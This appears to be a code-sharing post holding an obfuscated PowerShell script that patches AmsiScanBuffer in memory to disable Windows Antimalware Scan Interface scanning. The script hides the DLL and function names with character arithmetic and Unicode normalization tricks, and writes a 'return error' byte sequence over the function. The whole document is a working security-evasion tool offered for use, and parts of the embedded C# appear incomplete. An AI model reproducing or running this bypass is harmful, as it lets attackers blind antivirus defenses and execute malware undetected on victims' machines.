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Created February 13, 2023 14:18
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A simple powershell script to break the AMSI chain.
$_class = @"
using System;
using System.Runtime.InteropServices;
public class _class {
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
public static extern IntPtr LoadLibrary(string name);
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr lnsgbs, uint flNewProtect, out uint lpflOldProtect);
Add-Type $_class
$kkkk = 0
$jjjj = [_class]::LoadLibrary("$(('àmsì'+'.dll').nORMaLiZe([chAR]([bYTE]0x46)+[chAr]([BYTE]0x6f)+[chAR]([bYte]0x72)+[chAR]([Byte]0x6d)+[cHar](68*38/38)) -replace [chAr]([byTE]0x5c)+[char](112*87/87)+[ChaR](94+29)+[CHAR](64+13)+[CHAr]([bytE]0x6e)+[CHAR](58+67))")# Replaces FormD characters with FormC characters
$iiii = [_class]::GetProcAddress($jjjj, "$([char](6+59)+[char]([byte]0x6d)+[char](115*58/58)+[char](105+63-63)+[char](83)+[char](96+3)+[char](97)+[char](100+10)+[char](66*20/20)+[char](117)+[char](102*29/29)+[char]([byte]0x66)+[char]([byte]0x65)+[char](114+76-76))") # Get the address of the function with ProcAddress
[_class]::VirtualProtect($iiii, [uint32]5, 0x40, [ref]$kkkk)
$aaaa = "0x"
$cccc = $aaaa + "B"
$gggg = $aaaa + "5"
$cccc = $cccc + "8"
$ffff = $aaaa + "0"
$gggg = $gggg + "7"
$ffff = $ffff + "0"
$dddd = $aaaa + "8"
$eeee = $aaaa + "0"
$eeee = $eeee + "7"
$bbbb = $aaaa + "C"
$dddd = $dddd + "0"
$bbbb = $bbbb + "3"
$hhhh = [byte[]] ($cccc,$gggg,$ffff,$eeee,+$dddd,+$bbbb)
[System.Runtime.InteropServices.Marshal]::Copy($hhhh, 0, $iiii, 6)
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